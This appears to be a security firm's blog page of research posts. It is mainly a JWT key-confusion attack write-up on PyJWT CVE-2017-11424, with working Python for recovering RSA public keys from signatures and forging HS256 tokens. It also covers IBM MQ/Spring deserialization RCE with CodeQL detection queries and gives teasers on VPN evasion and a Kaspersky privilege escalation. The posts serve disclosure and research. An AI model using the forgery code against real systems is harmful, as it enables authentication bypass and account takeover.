Abusing JWT public keys without the public key

Author: b

This blog post is dedicated to those brave souls who dare to roll their own crypto

The RSA Textbook of Horrors

This story begins with an old project of ours, where we were tasked with verifying (among other things) how a business application handles digital signatures of transactions, to comply with the four-eyes principle and other security rules.

The application used RSA signatures, and after a bit of head scratching about why our breakpoints on the usual OpenSSL APIs didn’t trigger, while those placed in the depths of the library did, we realized that the developers had implemented what people in security like to call “Textbook RSA” in its truest sense. This of course led to red markings in the report and massive delays in development, but also presented us with some unusual problems to solve.

One of these problems stemmed from the fact that although we could present multiple theoretical attacks on the scheme, the public keys used in this application weren’t published anywhere, and without them we had no starting point for a practical attack.

At this point it’s important to remember that although public key cryptosystems guarantee that the private key can’t be derived from the public key, signatures, ciphertexts, etc., there are usually no such guarantees for the public key! In fact, the good people at the Cryptography Stack Exchange presented a really simple solution: just find the greatest common divisor (GCD) of the differences computed from all available message-signature pairs. Without going into the details of why this works (a more complete explanation is here), there are a few things worth noting:

  • An RSA public key is an (n,e) pair of integers, where n is the modulus and e is the public exponent. Since e is usually some hardcoded small number, we are only interested in finding n.
  • Although RSA involves large numbers, really efficient algorithms for finding the GCD of numbers have existed since ancient times (we don’t have to resort to brute-force factoring).
  • Although the presented method is probabilistic, in practice we can usually just try all possible answers. Additionally, our chances grow with the number of known message-signature pairs.

In our case, we could always recover public keys with just two signatures. At this time we had a quick and dirty implementation based on the gmpy2 library, which allowed us to work with large integers and modern, efficient algorithms from Python.
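
A minimal sketch of that quick and dirty approach (the function name and the small-factor cleanup are my own, not the original tool): since each signature satisfies s^e ≡ m (mod n), every value s^e - m is a multiple of n, so the GCD of two such values is n times a usually small cofactor. Here m is the integer that was actually signed (the raw representative in the textbook scheme, or a padded hash in standards-based schemes).

import gmpy2

def recover_modulus(m1, s1, m2, s2, e=65537):
    # s**e - m is computed over the integers (no modular reduction), so the
    # intermediate values are huge -- gmpy2/GMP handles this efficiently.
    k1 = gmpy2.mpz(s1) ** e - m1
    k2 = gmpy2.mpz(s2) ** e - m2
    n = gmpy2.gcd(k1, k2)
    # The GCD may be a small multiple of the real modulus; since n is the
    # product of two large primes, small factors can safely be divided out.
    for p in range(2, 10000):
        while n % p == 0:
            n //= p
    return n

Any leftover ambiguity can be resolved by checking the candidates against a known pair, e.g. pow(s1, e, n) == m1 % n.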

JOSE’s curse

It took a couple of weeks of management meetings and some sleep deprivation for it to strike me: the dirty little code we wrote for that custom RSA application could be useful against a more widespread technology: JSON Web Signatures, and JSON Web Tokens in particular.

Design problems of the above standards are well-known in security circles (unfortunately these concerns can’t seem to find their way to users), and alg=”none” fiascos regularly deliver facepalms. Now we are targeting a trickier weakness of user-defined authentication schemes: confusing symmetric and asymmetric keys.

If you are a developer considering/using JWT (or anything JOSE), please take the time to at least read this post! Here are some alternatives too.

In theory, when a JWT is signed using an RSA private key, an attacker may change the signature algorithm to HMAC-SHA256. During verification the JWT implementation sees this algorithm, but still uses the configured RSA public key as the verification key. The problem is that the symmetric verification process assumes the MAC was generated with the same key it verifies with – in this case the public key – so if the attacker has the RSA public key, she can forge the signature too.
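
Once an attacker has a byte-for-byte copy of the PEM-encoded public key that the verifier is configured with, the forgery itself takes only a few lines. A minimal sketch (the function names are mine, not part of any library):

import base64, hashlib, hmac, json

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def forge_hs256_token(claims, public_key_pem):
    # public_key_pem: the exact PEM byte string the verifier loads as its key
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signing_input = header + b"." + payload
    mac = hmac.new(public_key_pem, signing_input, hashlib.sha256).digest()
    return signing_input + b"." + b64url(mac)

A verifier that honors the attacker-controlled alg header and feeds its RSA public key to the HMAC routine will accept such a token as valid.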

In practice, however, the public key is rarely available (at least in a black-box setting). But as we saw earlier, we may be able to solve this problem with some algebra. The question is: are there any practical factors that would prevent such an exploit?

CVE-2017-11424

To demonstrate the viability of this method we targeted a vulnerability of PyJWT version 1.5.0 that allowed key confusion attacks as described in the previous section. The library uses a blacklist to reject key parameters that “look like” asymmetric keys in symmetric methods, but in the affected version it missed the “BEGIN RSA PUBLIC KEY” header, allowing PEM-encoded public keys in the PKCS #1 format to be abused. (I haven’t checked how robust this key filtering is now; deprecating verification APIs that don’t require an explicit algorithm is certainly the way to go.)
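
To illustrate the abuse in context, here is a hypothetical snippet against the vulnerable PyJWT 1.5.0 behavior, reusing the forge_hs256_token() sketch from above; pkcs1_pem_bytes stands for the reconstructed PKCS #1 PEM:

import jwt  # PyJWT 1.5.0

token = forge_hs256_token({"user": "admin"}, pkcs1_pem_bytes)
# The key blacklist misses the "BEGIN RSA PUBLIC KEY" marker, so the PEM is
# accepted as an HMAC secret and the forged token verifies successfully.
print(jwt.decode(token, pkcs1_pem_bytes))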

Based on the documentation, RSA keys are provided to the encode/decode APIs (which also do the signing and verification) as PEM-encoded byte arrays. For our exploit to work, we need to create a perfect copy of this array, based on message-signature pairs. Let’s start with the factors that influence the signature value:

  • Byte ordering: The byte ordering of JWS’s integer representations matches gmpy2’s.
  • Message canonicalization: According to the JWT standard, RSA signatures are calculated over the SHA-256 hash of the Base64URL-encoded parts of the token; no canonicalization of delimiters, whitespace or special characters is necessary.
  • Message padding: JWS prescribes deterministic PKCS #1 v1.5 padding. Using the appropriate low-level crypto APIs (this took me a while, until I found this CTF writeup) will provide us with standards-compliant output, without having to mess with ASN.1 (a minimal sketch follows this list).
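
A minimal sketch of that padding step, assuming a 2048-bit key (256-byte modulus) and using a function name of my own; it produces the integer representatives (the m values) consumed by the GCD trick above:

import hashlib

# DigestInfo prefix for SHA-256, as defined in PKCS #1
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")

def pkcs1_v15_representative(signing_input, key_bytes=256):
    # signing_input = b"<base64url(header)>.<base64url(payload)>"
    t = SHA256_PREFIX + hashlib.sha256(signing_input).digest()
    em = b"\x00\x01" + b"\xff" * (key_bytes - len(t) - 3) + b"\x00" + t
    return int.from_bytes(em, "big")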

No problem here: with some modifications of our original code, we could successfully recreate the Base64URL-encoded signature representations of JWT tokens. Let’s take a look at the container format (this guide is a great help):

  • Field ordering: Theoretically we could provide e and n in arbitrary order. Fortunately PKCS #1 defines a strict ordering of parameters in the ASN.1 structure.
  • Serialization: DER (and thus PEM) encoding of ASN.1 structures is deterministic.
  • Additional data: PKCS #1 doesn’t define additional (optional) data members for public keys.
  • Layout: While it is technically possible to parse PEM data without standard line breaks, files are usually generated with lines wrapped at 64 characters.

As we can see, PKCS #1 and PEM allow little room for changes, so there is a high chance that if we generate a standards-compliant PEM file, it will match the one at the target. In the case of other input formats, such as JWK, greater flexibility can result in a large number of possible encodings of the same key, which can block exploitation.

After a lot of cursing because of the bugs and insufficient documentation of the pyasn1 and asn1 packages, asn1tools finally proved usable for creating custom DER (and thus PEM) structures. The generated output matched the original public key perfectly, so I could successfully demonstrate token forgery without any preliminary information about the asymmetric keys.
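
For illustration, a minimal sketch of how the PKCS #1 / PEM structure can be assembled with asn1tools; the default exponent of 65537, the 64-character line wrapping and the trailing newline are assumptions based on common defaults, not guarantees:

import asn1tools, base64

PKCS1_SPEC = """
PKCS1 DEFINITIONS ::= BEGIN
    RSAPublicKey ::= SEQUENCE {
        modulus         INTEGER,
        publicExponent  INTEGER
    }
END
"""

def pkcs1_pem(n, e=65537):
    spec = asn1tools.compile_string(PKCS1_SPEC, "der")
    der = spec.encode("RSAPublicKey", {"modulus": int(n), "publicExponent": e})
    b64 = base64.b64encode(der)
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return b"\n".join([b"-----BEGIN RSA PUBLIC KEY-----"] + lines +
                      [b"-----END RSA PUBLIC KEY-----"]) + b"\n"

The resulting byte string can then be used directly as the HMAC “secret” in the forgery sketch above.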

We tested with the 2048-bit keys from the JWS standard: it took less than a minute on a laptop to run the GCD algorithm on two signatures, and it produced two candidate keys in PKCS #1 format, which could be easily tested.

As usual, all code is available on GitHub. If you need help integrating this technique into your Super Duper JWT Haxor Tool, use the Issue tracker!

Applicability

The main lesson is: one should not rely on the secrecy of public keys, as these parameters are not protected by mathematical trapdoors.

This exercise also showed the engineering side of offensive security, where theory and practice can be far apart: although the main math trick here may seem unintuitive, it’s actually pretty easy to understand and implement. What makes exploitation hard is figuring out all those implementation details that make pen-and-paper formulas work on actual computers. It won’t be a huge surprise to anyone who has worked with digital certificates and keys that at least 2/3 of the work involved here was about reading standards, making ASN.1 work, etc. (Not to mention constantly converting byte arrays and strings in Python 3 :P) Interestingly, it seems that the stiffness of these standards makes the format of the desired keys more predictable, and exploitation more reliable!

On the other hand, introducing unpredictable elements in the public key representations can definitely break the process. But no one would base security on their favorite indentation style, would they?


Unexpected Deserialization pt.1 – JMS

Author: b

On a recent engagement our task was to assess the security of a service built on IBM Integration Bus, an integration platform built around the Java Message Service (JMS). These scary-looking enterprise buzzwords usually hide systems of varying complexity connected by message queues. Since getting arbitrary test data in and out of these systems is usually non-trivial (more on this in the last section), we opted for a white-box analysis, which allowed us to discover interesting cases of Java deserialization vulnerabilities.

First things first, some preliminary reading:

  • If you are not familiar with message queues, read this tutorial on ZeroMQ, and you’ll realize that MQs are not magic, but they are magical :)
  • Matthias Kaiser’s JMS research provided the basis for this post; you should read it before moving on.

Our target received JMS messages using the Spring Framework. Transport of messages was done over IBM MQ (formerly IBM Websphere MQ), this communication layer and the JMS API implementation were both provided by IBM’s official MQ Client for Java.

Matthias provides the following vulnerable scenarios regarding Websphere MQ:

[Image: overview of vulnerable WebSphere MQ scenarios from Matthias Kaiser’s research – source]

We used everyone’s favorite advanced source code analysis tool – grep – to find references to the getObject() and getObjectInternal() methods, but found no results in the source code. Then we compiled the code and set up a test environment using the message broker Docker image IBM provides (this saved a lot of time), and as part of our dynamic tests we ran JMET against it. To our surprise, we popped a calculator in our test environment!

Now this was great, but to provide meaningful resolutions to the client, we needed to investigate the root cause of the issue. The application was really simple: it received a JMS message, created an XML document from its contents, and performed some other basic operations on the resulting Document objects. We recompiled the source with all the parsing logic removed to see if this was a framework issue – fortunately it wasn’t: with the parsing logic removed, the bug didn’t trigger. This narrowed down the code to just a few lines, since the original JMS message was essentially discarded after the XML document was constructed.

The vulnerability was in the code responsible for retrieving the raw contents of the JMS message. Although JMS provides strongly typed messages, and the expected payloads were strings, the developers used the getBody() method of the generic JMSMessage class to get the message body as a byte array. One could think (I sure did) that such a method would simply take a slice of the message byte stream and pass it back to the user, but there is a hint of something weirder in the method signature:

 <T> T getBody(java.lang.Class<T> c);

The method can return objects of arbitrary class?! After decompiling the relevant classes, all became clear: the method first checks if the class parameter is compatible with the JMS message type, and if it is, it casts the object in the body and returns it. If the JMS message is an Object message, it deserializes its contents, twice: first for the compatibility check, then to create the return object.

I don’t think this is something an average developer should think about, even if she knows about the dangers of deserialization. But this is not the only unintuitive thing that I encountered while falling down this rabbit hole.

Spring’s MessageConverter

At this point I have to emphasize that our original target wasn’t exactly built according to best practices: JMSMessage is specific to IBM’s implementation, so using it directly ties the application to the messaging platform, which is probably undesirable. To hide the specifics of the transport, the more abstract Message class is provided by the JMS API, but there are even more elegant ways to handle incoming messages.

When using Spring one can rely on the built-in MessageConverter classes that can automatically convert Messages to more meaningful types. So – as demonstrated in the sample app – this code:

receiveMessage(Message m){ /* Do something with m, whatever that is */ }

can become this:

receiveMessage(Email e){ /* Do something with an E-mail */ } 

Of course, using this functionality to automatically convert messages to arbitrary Serializable objects is asking for trouble, but Spring’s SimpleMessageConverter implementation can also handle simple types like byte arrays.

To see if converters guard against insecure deserialization, I created multiple branches of IBM’s sample application with different signatures for receiveMessage(). To my surprise, RCE could be achieved in almost all of the variants, even if receiveMessage()’s argument is converted to a simple String or byte[]! IBM’s original sample is vulnerable to code execution too (when the classpath contains appropriate gadgets).

After inspecting the code a bit more, it seems that listener implementations can’t expect received messages to be of a certain, safe type (such as TextMessage, when the application works with Strings), so they do their best to transform incoming messages to the type expected by the developer. Additionally, when an attacker sends Object messages, it is up to the transport implementation to define the serialization format and other rules. To confirm this, I ran some tests using ActiveMQ for transport, and the issue couldn’t be reproduced – the reason is clear from the exception:

Caused by: javax.jms.JMSException: Failed to build body from content. Serializable class not available to broker. Reason: java.lang.ClassNotFoundException: Forbidden class org.apache.commons.collections4.comparators.TransformingComparator!
This class is not trusted to be serialized as ObjectMessage payload. Please take a look at http://activemq.apache.org/objectmessage.html for more information on how to configure trusted classes.
at org.apache.activemq.util.JMSExceptionSupport.create(JMSExceptionSupport.java:36) ~[activemq-client-5.15.9.jar!/:5.15.9]
at org.apache.activemq.command.ActiveMQObjectMessage.getObject(ActiveMQObjectMessage.java:213) ~[activemq-client-5.15.9.jar!/:5.15.9]
at org.springframework.jms.support.converter.SimpleMessageConverter.extractSerializableFromMessage(SimpleMessageConverter.java:219) ~[spring-jms-5.1.7.RELEASE.jar!/:5.1.7.RELEASE]

As we can see, ActiveMQ explicitly prevents the deserialization of objects of known dangerous classes (commons-collections4 in the above example), and Spring expects such safeguards to be the responsibility of the JMS implementations – too bad IBM MQ doesn’t have that, resulting in a deadly combination of technologies.

In Tim Burton’s classic Batman, Joker poisoned Gotham City’s hygiene products, so that in certain combinations they produce the deadly Smylex nerve toxin. Image credit: horror.land

Update 2020.09.04.: I contacted Pivotal (Spring’s owner) about the issue, and they confirmed that they “expect messaging channels to be trusted at application level”. They also agree that handling ObjectMessages is a difficult problem that should be avoided when possible: their recommendation is to implement custom MessageConverters that only accept JMS message types that can be safely handled (such as TextMessage or BytesMessage).

Conclusions and Countermeasures

In Spring, not relying on the default MessageConverters, and expecting plain Message (or JMSMessage in the case of IBM MQ) objects in the JmsListener, prevents the problem independently of the transport implementation. Simple getters, such as getText(), can be safely used after casting. The use of even the simplest converted types, such as TextMessage, with IBM MQ is insecure! Common converters, such as the JSON-based MappingJackson2MessageConverter, need further research, as do other transports that decided not to implement countermeasures:

Patches resulting from Matthias’s research

Static Analysis

After identifying vulnerable scenarios I wanted to create automated tests to discover similar issues in the future. When aiming for insecure uses of IBM MQ with Spring, the static detection method is pretty straightforward:

  • Identify the parameters of methods annotated with JmsListener
  • Find cases where generic objects are retrieved from these variables via the known vulnerable methods.

In CodeQL a simple predicate can be used to find appropriately annotated sources:

class ReceiveMessageMethod extends Method {
  ReceiveMessageMethod() {
    this.getAnAnnotation().toString().matches("JmsListener")
  }
}

ShiftLeft Ocular also exposes annotations, providing a simple way to retrieve sources:

val sources=cpg.annotation.name("JmsListener").method.parameter

Identifying uses of potentially dangerous APIs is also reasonably simple, both in CodeQL:

predicate isJMSGetBody(Expr arg) {
  exists(MethodAccess call, Method getbody |
    call.getMethod() = getbody and
    getbody.hasName("getBody") and
    getbody.getDeclaringType().getAnAncestor().hasQualifiedName("javax.jms", "Message") and
    arg = call.getQualifier()
  )
}

… and in Ocular:

val sinks=cpg.typ.fullName("com.ibm.jms.JMSMessage").method.name("getBody").callIn.argument

Other sinks (like getObject()) can be added in both languages using simple boolean logic. An example run of Ocular can be seen in the following screenshot:

With Ocular, we can also get an exhaustive list of APIs that call ObjectInputStream.readObject() for the transport implementation in use, based on the available bytecode, without having to recompile the library:

ocular> val sinks = cpg.method.name("readObject")
sinks: NodeSteps[Method] = io.shiftleft.semanticcpg.language.NodeSteps@22be2e19
ocular> val sources=cpg.typ.fullName("javax.jms.Message").derivedType.method
sources: NodeSteps[Method] = io.shiftleft.semanticcpg.language.NodeSteps@4da2c297
ocular> sinks.calledBy(sources).newCallChain.l

This gives us the following entry points in IBM MQ:

  • com.ibm.msg.client.jms.internal.JmsMessageImpl.getBody – Already identified
  • com.ibm.msg.client.jms.internal.JmsObjectMessageImpl.getObject – Already identified
  • com.ibm.msg.client.jms.internal.JmsObjectMessageImpl.getObjectInternal – Already identified
  • com.ibm.msg.client.jms.internal.JmsMessageImpl.isBodyAssignableTo – Private method (used for type checks, see above)
  • com.ibm.msg.client.jms.internal.JmsMessageImpl.messageToJmsMessageImpl – Protected method
  • com.ibm.msg.client.jms.internal.JmsStreamMessageImpl.<init> – Deserializes javax.jms.StreamMessage objects.

The above logic can be reused for other implementations too, so accurate detections can be developed for the applications that rely on them. Connecting paths between applications and transport implementations doesn’t seem possible with static analysis, as the JMS API loads the implementations dynamically. Our static queries will soon be released on GitHub.

A Word About Enterprise Architecture and Threat Models

When dealing with targets similar to the one described in this article, it is usually difficult to create a practical test scenario that is technically achievable, and makes sense from a threat modeling perspective.

In our experience, this problem stems from the fact that architectures like ESB and the tools built around them provide abstractions that hide the actual implementation details from the end users and even administrators. And when people think about things like “message-oriented middleware” instead of long-lived TCP connections between machines, it can be hard to figure out that at the end of the day, one can simply send potentially malicious input to 10.0.0.1 by establishing a TCP connection to port 1414 on 10.1.2.3. This means that in many cases it’s surprisingly hard to find someone who can specify in technical terms where and how an application should be tested, not to mention getting these tests approved. Another result of this is that in many cases message queues are treated as inherently trusted – no one can attack a magic box that no one (at least none of us) knows exactly how it works, right?

Technical security assessments can be great opportunities not only to discover vulnerabilities early, but also to get more familiar with the actual workings of these complex, but not incomprehensible systems. In the end, we are the ones whose job is to understand these systems from top to bottom.

Special thanks to Matthias Kaiser and Fabian Yamaguchi for their tools and help in compiling this blog post! Featured image from Birds of Prey.


Tips and scripts for reconnaissance and scanning

Author: pz

Renewal paper of my GIAC Web Application Penetration Tester certification:

Tips and scripts for reconnaissance and scanning


Decrypting and analyzing HTTPS traffic without MITM

Author: dnet

Sniffing plaintext network traffic between apps and their backend APIs is an important step for pentesters to learn how they interact. In this blog post, we’ll introduce a method to simplify getting our hands on plaintext messages sent between the API and apps running on our attacker-controlled devices and, in the case of HTTPS, shoveling these requests and responses into Burp for further analysis, by combining existing tools and introducing a new plugin we developed. So our approach is less of a novel attack and more of an improvement on current techniques.

Of course, nowadays, most of these channels are secured using TLS, which provides encryption and integrity protection, and authenticates one or both ends of the figurative tube. In many cases, the best method to overcome this limitation is man-in-the-middle (MITM), where a special program intercepts packets and acts as a server to the client and vice versa.

For well-written applications, this doesn’t work out of the box, and it depends on the circumstances how many steps must be taken to weaken the security of the testing environment for this attack to work. It started with adding MITM CA certificates to OS stores; recent operating systems require more and more obscure confirmations, and certificate pinning is gaining momentum. The latter can get to a point where there’s a big cliff: either you can defeat it with automated tools like Objection, or it becomes a daunting task where you know it’s doable, but it’s frustratingly difficult to actually do.

(more…)


Uninitialized Memory Disclosures in Web Applications

Author: b

While we at Silent Signal are strong believers in human creativity when it comes to finding new or unusual vulnerabilities, we’re also constantly looking for ways to transform our experience into automated tools that can reliably and efficiently detect already known bug classes. The discovery of CVE-2019-6976 – an uninitialized memory disclosure bug in a widely used imaging library – was a particularly interesting finding to me, as it represented a lesser-known class of issues at the intersection of web application and memory safety bugs, so it seemed to be a nice topic for my next GWAPT Gold Paper.

(more…)


Unix-style approach to web application testing

Author: dnet

SANS Institute accepted my GWAPT Gold Paper about Unix-style approach to web application testing, the paper is now published in the Reading Room.

The paper introduces several problems I’ve been facing while testing web applications, which converged in a common direction. Burp Suite is known by most and used by many professionals in this field, and while it’s extensible, writing such bits of software has a higher barrier to entry than the budget of some projects would allow for a one-off throwaway tool. Our solution, Piper, is introduced through real-world examples to demonstrate its usage and show that it’s worth using. I tried showing alternatives to each subset of the functionality to stimulate critical thinking in the minds of fellow penetration testers, since this tool is not a silver bullet either. By describing the landscape in a thorough manner, I hope everyone can learn to pick the best tool for the job, which might or might not be Piper.

The full Gold Paper can be downloaded from the website of SANS Institute:

Unix-style approach to web application testing

The accompanying code is available on GitHub. For those who prefer video content, only have 2 minutes, or find the whole idea too abstract, we made a short demonstration of the basic features below. If you’re interested in deeper internals, there’s also a longer, 45-minute talk about it.


Wide open banking: PSD2 and us

Author: dnet

With the advent of PSD2 APIs, we had the opportunity to test some of them upon request from our clients. Although internet-facing APIs were already a thing thanks to smartphone apps, it seems that regulatory requirements and 3-way setups (customer, bank, provider) led to some surprises. Here are some of the things we found.

(more…)


Patching Android apps: what could possibly go wrong

Author: dnet

Many tools are timeless: a quality screwdriver will work just as fine in ten years as it did yesterday. Reverse engineering tools, on the other hand, need constant maintenance, as the technology we try to inspect with them is a moving target. We’ll show you how a simple exercise in Android reverse engineering resulted in three patches to an already up-to-date tool.

(more…)


Evading Cisco AnyConnect blocking LAN connections

Author: dnet

Some VPNs allow split tunneling; however, Cisco AnyConnect and many other solutions offer a way for network administrators to forbid this. When that happens, connecting to the VPN seals off the client from the rest of the LAN. As it turns out, breaking this seal is not that hard, which can be useful for special cases like performing pentests over a VPN designed for average users.

(more…)


Self-defenseless – Exploring Kaspersky’s local attack surface

Author: b

I had the pleasure to present my research about the IPC mechanisms of Kaspersky products at the IV. EuskalHack conference this weekend. My main motivation for this research was to further explore the attack surface hidden behind the self-defense mechanisms of endpoint security software, and I ended up with a local privilege escalation exploit that could be combined with an older self-defense bypass to make it work on default installations. I hope that the published information helps other curious people to dig even deeper and find more interesting pieces of code.

The presentation and some code examples are available on GitHub.

My local privilege-escalation exploit demo can be watched here:

The exploit code will be released at a later time on GitHub, so you can have some fun reconstructing it based on the slides ;)